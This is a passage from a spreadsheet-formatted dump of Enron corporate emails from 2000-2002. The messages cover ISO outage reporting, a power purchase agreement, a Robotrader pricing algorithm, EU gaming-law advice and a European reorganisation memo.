y to provide outage information to the ISO.  We are diligent in completing =_x000D_
outage reports and submitting them to the outage coordination desk at the I=_x000D_
SO.  The ISO is requiring an additional communication with the Real Time gr=_x000D_
oup to either: 1) confirm that the outage ended as planned, or 2) change th=_x000D_
e outage timing if required.  Although, to my knowledge, this requirement i=_x000D_
s not in the ISO tariff, and has not been communicated to SCs in writing in=_x000D_
 any way, and furthermore is a waste of time for everyone, will make effort=_x000D_
s to do this.  The ISO should recognize, however, that in most cases, our R=_x000D_
eal Time Group is not aware of outages our generator SC clients, nor should=_x000D_
 they be, as these units our off line and therefore "out of play" in Real T=_x000D_
ime.  Hildago should work to communicate better and treat people with respe=_x000D_
ct.  He clearly is not doing that with us.   =20_x000D_
_x000D_
_x000D_
Thanks_x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 04:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>DeAcero</t>
  </si>
  <si>
    <t xml:space="preserve">Elizabeth:_x000D_
_x000D_
Per your request, attached is the latest draft of the DeAcero PPA._x000D_
_x000D_
As I indicated to you on the telephone, it is Max Yzaguirre's intent to _x000D_
forward this document to DeAcero this afternoon as the final form of the _x000D_
document._x000D_
_x000D_
Please call with questions or comments._x000D_
----- Forwarded by Peggy Banczak/HOU/ECT on 10/24/2000 11:14 AM -----_x000D_
_x000D_
	Max Yzaguirre@ENRON_x000D_
	10/24/2000 10:57 AM_x000D_
		 _x000D_
		 To: Peggy Banczak/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: DeAcero_x000D_
_x000D_
Peggy:_x000D_
_x000D_
Here's a copy of the DeAcero PPA.  Drew said that he'd speak with Edith Cross _x000D_
and address her concerns._x000D_
_x000D_
_x000D_
Thanks - Max_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 05:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.cook@enron.com', 'mark.taylor@enron.com', 'sara.shackleton@enron.com'})</t>
  </si>
  <si>
    <t>Pulp/Paper</t>
  </si>
  <si>
    <t>Mark, Sara and Mary:_x000D_
Jim would like to talk to someone about problems he is having with his _x000D_
customers concerning the ISDA and CSA forms.  Apparently, most of his _x000D_
customers feel that it is too complicated and Jim would like to see if any _x000D_
alternatives exist.  Could someone please contact him?  Thanks._x000D_
_x000D_
Carol St. Clair_x000D_
EB 3889_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com</t>
  </si>
  <si>
    <t>Tue, 12 Feb 2002 07:04:27 -0800 (PST)</t>
  </si>
  <si>
    <t>I'll swing bye after morning rush_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Parks, Joe  _x000D_
Sent:	Tuesday, February 12, 2002 8:58 AM_x000D_
To:	Hayden, Frank_x000D_
Subject:	RE: _x000D_
_x000D_
they are all worth it, every penny. keep in touch let me know how things are going_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayden, Frank  _x000D_
Sent:	Tuesday, February 12, 2002 8:40 AM_x000D_
To:	Parks, Joe_x000D_
Subject:	RE: _x000D_
_x000D_
It is not complete.  I'm happy I was honest with people and told them I received a retention to stay?. _x000D_
There is another list, one that reflects traders bonus.  Rumors were that it was 800K average, 60MM disbursement.  It was ear tagged via Dynegy merger announcement, hence it didn't hit press._x000D_
Frank_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Parks, Joe  _x000D_
Sent:	Monday, February 11, 2002 9:20 AM_x000D_
To:	Hayden, Frank_x000D_
Subject:	_x000D_
_x000D_
your famous, you made the list. I do believe it is incomplete. How are things?_x000D_
http://salon.com/politics/feature/2002/02/08/enron_list/index.html</t>
  </si>
  <si>
    <t>Fri, 28 Sep 2001 13:41:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Robotrader/Autotrader</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Forster, David  _x000D_
Sent:	Monday, July 16, 2001 4:12 PM_x000D_
To:	Arnold, John_x000D_
Subject:	FW: Robotrader/Autotrader_x000D_
_x000D_
John,_x000D_
_x000D_
Attached is an email which I have sent to Savita (who will not be able to attend today). It addresses the Robotrader concept. I will bring some hardcopy to hit the high points this afternoon._x000D_
_x000D_
Dave_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Forster, David  _x000D_
Sent:	Monday, July 16, 2001 4:06 PM_x000D_
To:	Puthigai, Savita_x000D_
Subject:	Robotrader/Autotrader_x000D_
_x000D_
Savita,_x000D_
_x000D_
Attached is the latest Robotrader spreadsheet._x000D_
_x000D_
As you may recall, we tried several different approaches to minimizing the cost of the market running up and then down again._x000D_
_x000D_
The solution which gave the best solution was also the simplest one._x000D_
_x000D_
Principles as follows:_x000D_
_x000D_
- Basically an advanced Offset to Last Trade_x000D_
- Definitions_x000D_
	- Intensity: Measures the length of time between transactions as a rolling average over the last x number of transactions (the Intensity Factor)_x000D_
	- Intensity Factor: The number of transactions used in calculating the rolling average Intensity_x000D_
	- Dead Interval: The period of time in which (if nothing occurs), an event or transaction is deemed to take place._x000D_
	- Offset Reversion Ratio: The percentage by which the Offset will be reduced if a Dead Interval passes_x000D_
	- Spread Minimum: The minimum spread which can be used._x000D_
	- Offset Minimum: The minimum offset which may be used._x000D_
	- Spread-Offset Minimum: The minimum amount by which the spread must exceed the offset_x000D_
	- Spread Reversion Rate: The amount in dollars by which the spread will decrease if a Dead Interval passes_x000D_
	- Position Sensitivity: The position which, if exceeded, will cause the V Factor Adjustment to increase_x000D_
	- V-Factor adjust: The amount by which the Momentum will be increased if the Position Sensitivity is exceeded._x000D_
	- Momentum: The measure of the degree to which the market is either just buying or just selling_x000D_
	- Adjusted Momentum: A Momentum number which may be boosted, causing a larger price reaction when the Position Sensitivity is exceeded._x000D_
	- Offset: The amount by which a bid or offer will be increased/decreased when a transaction occurs._x000D_
	- Spread: The difference between the bid and the offer_x000D_
- General Principles and Mechanics_x000D_
	- As each Sell (Buy) occurs, the Momentum decreases (increases)._x000D_
	- The Adjusted Momentum is the same as the Momentum, unless the Position Sensitivity is exceeded._x000D_
	- If the Position Sensitivity is exceeded, then the Adjusted Momentum is boosted by the V-Factor Adjustment_x000D_
	- The Offset is calculated by looking up the Offset value on a table for the specified Adjusted Momentum_x000D_
	- The Spread is calculated by looking up the value to boost (decrease) the Spread on a table for the Specified Intensity_x000D_
	- As the Intensity value drops, the Spread widens. As it increases, the Spread decreases._x000D_
	- In a running market, the offset will increase quickly. If it establishes a new level, the Offset will slowly decrease_x000D_
	- If the market runs up and whipsaws back, the offset will stay large_x000D_
	- If a market range trades, the offset will trend to zero._x000D_
	- If there are a large number of transaction in succession, the spread will widen_x000D_
	- If there are a small number of transactions in succession, the spread will tighten._x000D_
_x000D_
 _x000D_
_x000D_
Dave_x000D_
_x000D_
	</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 08:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: meet on 3/8</t>
  </si>
  <si>
    <t>Andy I forgot I wont be  the am - my nanny is out.  Can we talk by phone.  _x000D_
Sorry for the inconvenience.</t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 00:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'leticia.botello@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'mike.smith@enron.com', 'eric.melvin@enron.com', 'vladimir.gorny@enron.com', 'jeff.dasovich@enron.com', 'gayle.muench@enron.com', 'don.black@enron.com', 'neil.bresnan@enron.com', 'dennis.benevides@enron.com', 'evan.hughes@enron.com', 'james.lewis@enron.com', 'meredith.eggleston@enron.com', 'jess.hewitt@enron.com', 'scott.stoness@enron.com', 'william.bradford@enron.com', 'scott.gahn@enron.com', 'neil.hong@enron.com', 'tony.spruiell@enron.com'})</t>
  </si>
  <si>
    <t>Reminder-Call in # - Level Setting Mtg-California Markets Focus_x000D_
 Group</t>
  </si>
  <si>
    <t xml:space="preserve">Date: 12/18/00 Time: 10:00 a.m. - 11:00 a.m. (Central Standard Time) _x000D_
Location: EB2868_x000D_
_x000D_
Call in # 1-800-713-8600 Pass Code 80435_x000D_
_x000D_
Please call me if you have any questions.  _x000D_
_x000D_
Leticia Botello_x000D_
x-58752_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 06:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Gaming advice in the various EU jurisdictions</t>
  </si>
  <si>
    <t xml:space="preserve">Mark:_x000D_
_x000D_
Attached please find the other e-mail summarizing the pending jurisdictional _x000D_
matters. Please note that Justin and I have determined that because Enron _x000D_
could be exposed to criminal liability in the Netherlands, we will exclude _x000D_
residents notwithstanding low risk of prosecution.  We are awaiting advise re _x000D_
rather the same state of affairs exists in Italy - low probability of _x000D_
prosecution but some risk of criminal liability._x000D_
_x000D_
Leslie_x000D_
----- Forwarded by Leslie Hansen/HOU/ECT on 08/28/2000 01:43 PM -----_x000D_
_x000D_
	Leslie Hansen_x000D_
	08/25/2000 09:03 AM_x000D_
		_x000D_
		 To: "Murton, Rachel" &lt;rachel.murton@linklaters.com&gt;@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re: Gaming advice in the various EU jurisdictions_x000D_
_x000D_
Rachel:_x000D_
_x000D_
Thank you so much for the feedback.  I will follow up later this morning to _x000D_
address those questions that have yet to be answered._x000D_
_x000D_
With regard to a summary of your Olympic research in other jurisdictions, I _x000D_
would very much appreciate a summary._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Leslie_x000D_
_x000D_
_x000D_
_x000D_
	"Murton, Rachel" &lt;rachel.murton@linklaters.com&gt;_x000D_
	08/25/2000 06:17 AM_x000D_
		 _x000D_
		 To: "'leslie.hansen@enron.com'" &lt;leslie.hansen@enron.com&gt;_x000D_
		 cc: "Didizian, Marly" &lt;marly.didizian@linklaters.com&gt;, _x000D_
"'justin.boyd@enron.com'" &lt;justin.boyd@enron.com&gt;_x000D_
		 Subject: Gaming advice in the various EU jurisdictions_x000D_
_x000D_
_x000D_
Thank you for your e-mails._x000D_
_x000D_
I set out below the advice we have received from the various jurisdictions._x000D_
_x000D_
1.  Countries that can be added to the approved list:_x000D_
_x000D_
We have now received the advice from Portugal, and as with the Euro 2000_x000D_
game, the High Five Flag Game does not violate Portugese law, because_x000D_
participants do not have to pay to enter and because it is run outside_x000D_
Portugal - so you can add Portugal to the list of approved jurisdictions._x000D_
_x000D_
Finland can now also be added to the approved list. The game would not be_x000D_
considered a lottery, as the players would not pay to enter.  It should not_x000D_
be considered a restricted marketing measure providing there is no_x000D_
obligation to purchase goods (which I understand is the situation).  Tax_x000D_
issues were also initially a concern i.e. it was thought that Enron might be_x000D_
liable to pay tax if it awarded a prize to a Finnish citizen.  However,_x000D_
after discussions with the relevant tax authorities, this tax issue seems to_x000D_
have fallen away - because Enron, as a foreign organiser would not have any_x000D_
liabilites towards the Finnish tax office.  [If a Finnish citizen won the_x000D_
prize, they themselves might have to pay tax on it - but I assume that this_x000D_
is not a concern of Enron, since they themselves would not have liability_x000D_
towards the Finnish tax office]._x000D_
_x000D_
2.  Countries that could possibly be added to the approved list, provided_x000D_
certain facts are confirmed (with either Enron or the regulatory_x000D_
authorites),and/or  further information is provided._x000D_
_x000D_
As with Euro 2000 Poland is also looking likely - the Polish lawyers require_x000D_
me to confirm that Enron's customers are permitted to use Enron's website_x000D_
for online trading even if they have not purchased anything from Enron in_x000D_
the past and do not intend to do so in the future.  It is my understanding,_x000D_
that this is the case  - so assuming this is correct, Poland could be added_x000D_
to the approved list._x000D_
_x000D_
Belgium - it is unclear under Belgium law whether the game is a Games of_x000D_
Chance, a Lottery, or a Contest.  They need to forward a demo to the_x000D_
regulatory authorities.  I have not yet checked whether the demo sent_x000D_
yesterday is complete enough (our web access was very slow thsi morning)  -_x000D_
but, as suggested in your e-mail, I will contact Dave Samuels if I need a_x000D_
substantially more complete demo._x000D_
_x000D_
Italy - Approval is needed in Italy if the game is an advertising contest_x000D_
addressed to Italian residents. The scheme would be classified as an_x000D_
advertising contest - the key is whether it is addressed to Italian_x000D_
residents.  Our Italian lawyers would like to know how many users there will_x000D_
be in Italy, and would like us to confirm that the site will be in English_x000D_
and from a server located in the UK. In order to obtain approval, the_x000D_
Italian lawyers need to know whether Enron has a subsidiary in Italy - if it_x000D_
does, the application needs to be made on behalf of this company, - if it_x000D_
doesn't have an Italian subsidiary then they cannot actually apply for_x000D_
approval of the scheme.  An integral feature of being an advertising contest_x000D_
is that a prize is awarded, so if Italian participants are excluded from_x000D_
being awarded a prize, the game won't be an advertising contest addressed to_x000D_
Italian residents._x000D_
_x000D_
Sweden - The game is a lottery under Swedish law and therefore requires_x000D_
approval (which there is virtually no chance of Enron obtaining because it_x000D_
is not a charitable organisation) if it is addressed to the Swedish public_x000D_
(as a general rule more than 250 people).  Our Swedish lawyers therefore_x000D_
need to know how many participants there are in Sweden - if it is less than_x000D_
250, then there seems to be a good chance that the game can go ahead - but I_x000D_
will confirm this with them._x000D_
_x000D_
Norway.  There are four issues affecting the game in Norway - these are_x000D_
whether the game is a lottery, whether the game is a money game, whether the_x000D_
game promotes a business, and tax issues.  After informal talks with the_x000D_
relevant ministries, th first two issues have fallen away, and are now no_x000D_
longer a problem.  The Norwegian lawyers had some concerns as to whether the_x000D_
purpose of the scheme  was to promote Enron - but I believe that, if I can_x000D_
confirm to them that customers are permitted to use Enron's website for_x000D_
online trading even if they have not purchased anything from Enron in the_x000D_
past and do not intend to so in the future -  i.e. that the game is a_x000D_
"gimmick" and not a promotional tool (as for Poland) this will drop away._x000D_
The tax issues are similar to those initially expressed by the Finnish_x000D_
lawyers - and may fall away after consultation with the Norwegian_x000D_
authorites._x000D_
_x000D_
_x000D_
3.  Jurisdictions where there is a technical  risk of violating local laws_x000D_
but a low risk of enforcement_x000D_
_x000D_
Netherlands - technically the game violates the Dutch Games of Chance Act_x000D_
(DGCA). However, it  is not clear that the DGCA applies to internet games,_x000D_
and our Dutch colleagues are not aware of any instances where internet games_x000D_
have been prosecuted under the Act. They beleive that even if the Dutch_x000D_
authorites were alerted to the game, games offered for a limited period of_x000D_
time for moderate prozes would not be high on teh list of the dutch_x000D_
authorities priorites!  There is also the issue that Dutch courts probably_x000D_
won't consider themselves to have jurisdiction because, for example, the_x000D_
prizes are expressed in GBP, the game is run from a UK server, the language_x000D_
is English, and the game does not violate laws in jurisdiction it is run_x000D_
from, although no guarantee of this can obviously be given._x000D_
_x000D_
4.  Miscellaneous_x000D_
_x000D_
We await advice from Spain.  I have received, but not yet reviewed, the_x000D_
advice from France (but from a brief glance, it does not look favouarble_x000D_
regarding allowing French citizens to participate)._x000D_
_x000D_
_x000D_
I also have advice from the various jurisdictions relating to whether Enron_x000D_
employees themselves can participate (this looks favourable - obviously as_x000D_
long as the game is conducted fairly).  I will review the specifics of this_x000D_
advice, and forward it to you, along with the advice we have on disclaimers._x000D_
I should be able to do this this afternoon/evening  (UK time)._x000D_
_x000D_
I have advice from most of the jursidictions on Olympic legislation.  Would_x000D_
you like a summary of this advice for future reference? - it makes_x000D_
interesting, if largely depressing, reading!_x000D_
_x000D_
Rachel_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_____________________________________________________________x000D_
_x000D_
This message is confidential. It may also be privileged or_x000D_
otherwise protected by work product immunity or other legal_x000D_
rules. If you have received it by mistake please let us know_x000D_
by reply and then delete it from your system; you should not_x000D_
copy the message or disclose its contents to anyone._x000D_
_____________________________________________________________x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 08:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'edgroup@eei.org'})</t>
  </si>
  <si>
    <t>frozenset({'meyer@enron.com', 'mpavlou@enron.com', 'ton.chapman@enron.com', 'cyoder@enron.com', 'skean@enron.com', 'dallegre@enron.com', 'dfossum@enron.com', 'jkeller@enron.com', 'mary.hain@enron.com', 'ddorman@enron.com', 'fbay@enron.com', 'tom_delaney@enron.com', 'smontova@enron.com', 'fking@enron.com', 'bill.williams@enron.com', 'jsteffe@enron.com', 'chris.gaffney@enron.com', 'scorman@enron.com', 'blichte@enron.com', 'stweed@enron.com', 'scovino@enron.com', 'snovose@enron.com', 'anthony.duenner@enron.com', 'julia.murray@enron.com', 'jhartso@enron.com', 'rfrank@enron.com', 'lhuber@enron.com'})</t>
  </si>
  <si>
    <t>Are You Following the California Energy Crisis?</t>
  </si>
  <si>
    <t>EEI's State Restructuring Service has expanded its coverage of the California _x000D_
Energy Crisis and put all its email Action Alerts and a new Chronology of _x000D_
Crisis events in one place on its Web site.  As part of your subscription to _x000D_
the State Restructuring Web site, you get:_x000D_
_x000D_
o A regularly updated chronology of crisis events_x000D_
o All laws responding to the crisis, including important regulatory and court _x000D_
decisions_x000D_
o News of legal, financial, grid operations, federal, and regional _x000D_
perspectives_x000D_
o E-mail notification of noteworthy events_x000D_
_x000D_
Updated as policy actions and operating events are reported, this is one _x000D_
resource you don't want to miss as the crisis heads into the summer!_x000D_
_x000D_
EEI's State Restructuring Service continues to be your one-stop electronic _x000D_
resource for complete information on all the other states that are _x000D_
restructuring, including those that are delaying their processes out of _x000D_
concern over California's experience._x000D_
_x000D_
Consisting of access to our Web-based resource and an e-mail alert service, _x000D_
this yearly subscription provides you with timely briefs on important state _x000D_
regulatory, legislative, and judicial actions, full analyses of the most _x000D_
important policies, and comprehensive background on existing policies of _x000D_
restructuring states._x000D_
_x000D_
To see a free sample of Action Alerts recently added to the Web site on _x000D_
restructuring events in all states, including California, please visit this _x000D_
link:_x000D_
_x000D_
http://www.eei.org/edg/dist/state.htm_x000D_
_x000D_
Learn more about this valuable resource and how EEI Utility Members can _x000D_
access the service for FREE. Go to: http://www.eei.org/products and visit the _x000D_
Electronic Subscription section._x000D_
_x000D_
We hope you found this message useful. However, if you'd rather not receive _x000D_
future e-mails of this sort from EEI, please send a message to _x000D_
catalog@eei.org ._x000D_
_x000D_
 - srs_california.htm</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 05:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'courtney_abernathy@yahoo.com'})</t>
  </si>
  <si>
    <t>Re: Spring Break Pow Wow</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings:_x000D_
Unfortunately, I'll be in Mexico getting the Mexican version of hoof and _x000D_
mouth.  Bummer.  Of course, the highlight of the semester for me was seeing _x000D_
Ms Deepika at Squaw last weekend.  We should commit to a ski trip next year. _x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Courtney Abernathy &lt;courtney_abernathy@yahoo.com&gt;_x000D_
	03/20/2001 07:18 PM_x000D_
		 _x000D_
		 To: "Kelly, Jacqueline" &lt;Jacqueline.Kelly@schwab.com&gt;, "Chris Neale _x000D_
\(E-mail\)" &lt;chrisjneale@hotmail.com&gt;, "Courtney Abernath \(E-mail\)" _x000D_
&lt;abernath@haas.berkeley.edu&gt;, "Deepika Shah \(E-mail\)" _x000D_
&lt;dshah@haas.berkeley.edu&gt;, "Jeff Dasovich \(E-mail\)" _x000D_
&lt;dasovich@haas.berkeley.edu&gt;, "Paul Brodie \(E-mail\)" _x000D_
&lt;brodie@haas.berkeley.edu&gt;, "Ted Chin \(E-mail\)" &lt;tedchin@hotmail.com&gt;, _x000D_
"'wise@haas.berkeley.edu'" &lt;wise@haas.berkeley.edu&gt;_x000D_
		 cc: _x000D_
		 Subject: Re: Spring Break Pow Wow_x000D_
_x000D_
How about...I'll be in London?  Seriously!  It never_x000D_
fails!  Must be karma-something!  No spring break and_x000D_
no b-day celebrations for me...just hoof and mouth_x000D_
disease.  I'll miss you all...who's birthday's are_x000D_
next?  I'll just have to save my celebrations up, I_x000D_
guess.  _x000D_
Always something, _x000D_
Courtney_x000D_
_x000D_
--- "Kelly, Jacqueline" &lt;Jacqueline.Kelly@schwab.com&gt;_x000D_
wrote:_x000D_
&gt; Since I forgot to send something out sooner for_x000D_
&gt; dinner this Thursday, and_x000D_
&gt; after 5 semesters at Haas we finally get a Spring_x000D_
&gt; Break, lets get together_x000D_
&gt; and catch up next Wednesday._x000D_
&gt; _x000D_
&gt; I was thinking dinner in the city (baby's and s/o's_x000D_
&gt; invited) and no excuses,_x000D_
&gt; Courtney!  :)_x000D_
&gt; _x000D_
&gt; I could have it in the Mission or Noe Valley to make_x000D_
&gt; it easier for our_x000D_
&gt; friends in the peninsula - any suggestions?_x000D_
&gt; _x000D_
&gt; We also have two birthdays to celebrate: Teddy and_x000D_
&gt; Paul._x000D_
&gt; _x000D_
&gt; Hope to see you next week!_x000D_
&gt; _x000D_
&gt; -Jackie_x000D_
&gt; _x000D_
&gt; Jacqueline Kelly_x000D_
&gt; Treasury_x000D_
&gt; Charles Schwab &amp; Co, Inc_x000D_
&gt; (415) 667-3915_x000D_
&gt; _x000D_
&gt; Warning: All e-mail sent to or from this address_x000D_
&gt; will be received or_x000D_
&gt; otherwise  _x000D_
&gt; recorded by the Charles Schwab corporate e-mail_x000D_
&gt; system and is subject to_x000D_
&gt; archival, monitoring or review by, and/or disclosure_x000D_
&gt; to, someone other than_x000D_
&gt; the_x000D_
&gt; recipient._x000D_
&gt; _x000D_
&gt; _x000D_
_x000D_
&gt; ATTACHMENT part 2 application/ms-tnef _x000D_
_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Get email at your own domain with Yahoo! Mail. _x000D_
http://personal.mail.yahoo.com/_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Feb 2001 01:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EES Europe - Outsourcing Reorganisation</t>
  </si>
  <si>
    <t xml:space="preserve">Matthew, would your Monday meeting be a good time (if the time change works) _x000D_
for me to introduce myself and say a few words via video conference or the _x000D_
like to your organization?_x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 02/09/2001 _x000D_
09:01 AM ---------------------------_x000D_
_x000D_
_x000D_
Matthew Scrimshaw_x000D_
02/09/2001 03:04 AM_x000D_
To: Enron London EES Group_x000D_
cc: John Sherriff/LON/ECT@ECT, Michael R Brown/LON/ECT@ECT, David W _x000D_
Delainey/HOU/ECT@ECT, Janet R Dietrich/HOU/ECT@ECT, Dan Leff/HOU/EES@EES, _x000D_
Marty Sunde/HOU/EES@EES, Richard Lewis/LON/ECT@ECT _x000D_
Subject: EES Europe - Outsourcing Reorganisation_x000D_
_x000D_
Introduction_x000D_
_x000D_
EES has been operating in Europe since late 1999 and in that time a lot of _x000D_
progress has been made.  The teams who have worked on Outsourcing in Europe _x000D_
have learnt a tremendous amount over the last year.  We now have a much _x000D_
clearer idea of what should work today in the different jurisdictions that _x000D_
comprise Europe and those elements of our offering with which customers are _x000D_
most comfortable._x000D_
_x000D_
The phenomenally strong financial performance in 2000 of Enron Direct and _x000D_
ETOL graphically demonstrate the future potential in Europe for a broad _x000D_
retail energy business.  With Enron's retail energy presence in Europe firmly _x000D_
established, we are restructuring our Outsourcing product offering and the _x000D_
organisation to develop and deliver it, so that we broaden our activities and _x000D_
successfully grow our earnings in line with shareholder expectations._x000D_
_x000D_
We now have a renewed focus in 2001.  The emphasis will be to work on only _x000D_
the largest deals (by energy commodity spend) in those markets where we _x000D_
already have a robust wholesale energy business and there is regulated and _x000D_
economic third party access to retail power distribution systems.  The main _x000D_
thrust of our offering will be commodity and Demand Side Management (DSM) _x000D_
projects and our associated price risk management capabilities.  Commodity is _x000D_
Enron's core competence and one where Enron should be in a position to _x000D_
generate sizeable gross margin at closure.  DSM projects are also important _x000D_
as they will deliver gross margin and are what differentiate us from the _x000D_
commodity competition.  We will be focussing on shorter project lead times at _x000D_
the front of a deal to ensure that we get to closure promptly - we need to _x000D_
see 80% of the value in 20% of the time.  Whilst we retain an understanding _x000D_
of O&amp;M, this will not form part of our core offering and we will only _x000D_
consider involvement in an O&amp;M capacity on attractive margin transactions _x000D_
where it is essential to the customer.  As the business develops it is likely _x000D_
that, to some extent, we will build the necessary O&amp;M delivery capability to _x000D_
enhance the product offering in the future._x000D_
_x000D_
In those markets where we have limited wholesale capability or the third _x000D_
party access to power distribution systems is not feasible in a retail _x000D_
context, we will build and develop Utility Representation Services (URS) in _x000D_
conjunction with a DSM project offering.  This knowledge based business will _x000D_
allow us to develop retail customer networks in advance of economic system _x000D_
access and also provide valuable market information back to the wholesale _x000D_
business.  URS is ERPAG's core business and gives us a tremendous platform to _x000D_
create a pan European URS competence._x000D_
_x000D_
Expertise in Supply Side Management has increasingly become an issue for the _x000D_
origination team in EES Europe as we have begun to get into material deal _x000D_
development.  Whilst it is vital that we remain totally coordinated with the _x000D_
wholesale business for price risk management services, there will be a _x000D_
renewed emphasis within EES Europe to develop those commodity skills that do _x000D_
not reside in the wholesale business to allow us to promptly and effectively _x000D_
price and structure retail commodity transactions to the delivery point._x000D_
_x000D_
Given the renewed focus outlined above, we have taken the opportunity to _x000D_
streamline the Account Delivery and Management team, typically redeploying _x000D_
staff where they can immediately support the development of new business for _x000D_
EES Europe.  Effective Account Management remains a key capability for EES _x000D_
and as we close deals with customers we will review our staffing need in this _x000D_
area._x000D_
_x000D_
Organisation_x000D_
_x000D_
After eighteen months working on establishing the outsourcing business in _x000D_
Europe, Ron Bertasi has decided to transition back to the US during the first _x000D_
half of 2001.  In the short term he will complete the Trillium property deal _x000D_
and ensure that the energy and property deals are both successfully _x000D_
launched.  I would like to take this opportunity to thank Ron, on behalf of _x000D_
everyone in Europe, for all his hard work over the last eighteen months in _x000D_
establishing the European Outsourcing business and in particular his _x000D_
leadership on the Trillium deal which represents a substantial landmark for _x000D_
the business._x000D_
_x000D_
Stuart Rexrode is now head of European Energy Services Outsourcing.  Stuart _x000D_
will continue in a customer facing capacity as a lead originator, whilst _x000D_
ensuring that all of the dimensions that comprise the Outsourcing team remain _x000D_
appropriately focussed.  Bob Manasse will head up the origination team and _x000D_
ensure that the deal pipeline remains full of substantial good quality _x000D_
prospects._x000D_
_x000D_
Hala Tayyarah has been promoted to Manager within the Commodity team and will _x000D_
provide commodity pricing support to the origination team.  Hala will report _x000D_
to Peter Redpath until such time as a head of Supply Side Management is _x000D_
appointed._x000D_
_x000D_
Reporting to Peter Redpath, Peter Ramgolam will lead a new activity, _x000D_
Transaction Economics, supporting Origination by developing cashflow models _x000D_
to determine deal economics, identify improvements to structures to optimise _x000D_
value and capture transactions for risk management purposes._x000D_
_x000D_
Also reporting to Peter Redpath, John Parker will lead the implementation of _x000D_
a Position Management activity._x000D_
_x000D_
The attached organisation charts show these changes in the revised structure _x000D_
of EES Europe which is effective immediately.  Whilst these charts are _x000D_
relatively self explanatory for the levels shown, there will be detailed _x000D_
discussions over the next day or so to explain what the changes mean for _x000D_
individuals.  Where boxes are labelled TBA, we hope to make appointments in _x000D_
the near future._x000D_
_x000D_
At 10.30am on Monday 12th February we shall be holding a one hour EES-Europe _x000D_
all employee meeting in the Auditorium in place of the usual weekly staff _x000D_
meeting.  At this session we will talk about the 2001 Earnings Plan and _x000D_
provide clarity on the deal process for Outsourcing and the reasoning behind _x000D_
it.  Also, it will be an opportunity for you to raise any questions you may _x000D_
have.  I look forward to seeing you there._x000D_
_x000D_
Matthew_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Mar 2001 14:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>TW Neg. Rates</t>
  </si>
  <si>
    <t xml:space="preserve">I got your message and understand you can't get all of us and Steve Harris in _x000D_
a meeting before Friday.  Lets do it this way:  I'll call Maria and MKM _x000D_
tomorrow am to discuss what we have learned so far and I'll grab Steve _x000D_
separately to update him.  No need for all of us in one meeting.  Thanks for _x000D_
trying.  df </t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 00:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Amendment Document</t>
  </si>
  <si>
    <t xml:space="preserve">Frank:  Do you have the Glencore file?_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 03/02/2001 08:51 AM -----_x000D_
_x000D_
	Brant Reves/ENRON@enronXgate_x000D_
	03/02/2001 08:50 AM_x000D_
		 _x000D_
		 To: Frank Sayre/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
David.Porter@glencore-us.com@SMTP@enronXgate_x000D_
		 cc: Sara Shackleton@ECT_x000D_
		 Subject: RE: Amendment Document_x000D_
_x000D_
David,_x000D_
_x000D_
We continue to wait for word from you on the availability of additional _x000D_
financial information to review Glencore International AG.  We are looking _x000D_
for similair information to that which was provided S&amp;P.  Without such _x000D_
information, a limited global credit line  will be allocated per your _x000D_
direction._x000D_
_x000D_
Sara, I believe we should holdoff preparing executable documents until we _x000D_
hear back from David.  That way, we can include in a single amendment those _x000D_
changes I referenced in my credit worksheet._x000D_
_x000D_
thanks_x000D_
brant_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Sayre, Frank  _x000D_
Sent: Thursday, March 01, 2001 3:27 PM_x000D_
To: David.Porter@glencore-us.com_x000D_
Cc: Sara Shackleton@ECT; Reves, Brant_x000D_
Subject: Amendment Document_x000D_
_x000D_
David - Per our telephone conversation of earlier today, please find the _x000D_
document amending the ISDA Master Agreement dated July 11, 1994 between _x000D_
